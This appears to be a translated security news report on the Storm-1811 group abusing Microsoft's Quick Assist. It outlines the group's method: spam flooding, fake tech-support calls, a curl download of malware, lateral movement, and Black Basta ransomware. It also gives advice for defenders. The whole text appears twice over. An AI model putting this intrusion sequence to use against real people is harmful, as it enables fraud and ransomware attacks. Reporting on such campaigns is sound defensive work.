Attacking everyone in a row, attackers use a proven method of entering the computer.
The Microsoft Threat Intelligence discovered a new campaign by the Storm-1811 group, which uses the Quick Assist tool to conduct social engineering attacks on users.
Quick Assist is a legitimate Microsoft application that allows the user to connect to another device via a remote connection to solve technical problems. The app is installed by default on Windows 11 devices.
The attacker uses Quick Assist to perform social engineering attacks by pretending to be a trusted contact in order to gain initial access to the victim's device. To make the attacks more convincing, the hacker uses the link listing method, signing up the victim's email addresses for mailing lists in order to flood her mailbox with spam.
The cybercriminal then calls the victim, posing as a tech support employee and offering help in solving the spam problem. You can connect to the device via Quick Assist. When the user allows access, the attacker executes the curl command to download and execute malicious files. The obtained access is used to list domains and move laterally around the network, after which PsExec is used to distribute the Black Basta ransomware program.
The campaign, which began in mid-April, targets a variety of industries, including manufacturing, construction, food processing, and transportation, demonstrating the opportunistic nature of the attacks.
Organizations are encouraged to block or remove Quick Assist and similar tools if they are not used, and train employees to recognize such scams.
Storm-1811 is a financially motivated group known for using Black Basta ransomware. The attack scheme begins with simulating phone calls, during which attackers, posing as Microsoft technical support or IT specialists of the victim's company, convince them to install tools for remote monitoring and management. QakBot, Cobalt Strike, and eventually Black Basta are then delivered to the device.
The Microsoft Threat Intelligence discovered a new campaign by the Storm-1811 group, which uses the Quick Assist tool to conduct social engineering attacks on users.
Quick Assist is a legitimate Microsoft application that allows the user to connect to another device via a remote connection to solve technical problems. The app is installed by default on Windows 11 devices.
The attacker uses Quick Assist to perform social engineering attacks by pretending to be a trusted contact in order to gain initial access to the victim's device. To make the attacks more convincing, the hacker uses the link listing method, signing up the victim's email addresses for mailing lists in order to flood her mailbox with spam.
The cybercriminal then calls the victim, posing as a tech support employee and offering help in solving the spam problem. You can connect to the device via Quick Assist. When the user allows access, the attacker executes the curl command to download and execute malicious files. The obtained access is used to list domains and move laterally around the network, after which PsExec is used to distribute the Black Basta ransomware program.
The campaign, which began in mid-April, targets a variety of industries, including manufacturing, construction, food processing, and transportation, demonstrating the opportunistic nature of the attacks.
Organizations are encouraged to block or remove Quick Assist and similar tools if they are not used, and train employees to recognize such scams.
Storm-1811 is a financially motivated group known for using Black Basta ransomware. The attack scheme begins with simulating phone calls, during which attackers, posing as Microsoft technical support or IT specialists of the victim's company, convince them to install tools for remote monitoring and management. QakBot, Cobalt Strike, and eventually Black Basta are then delivered to the device.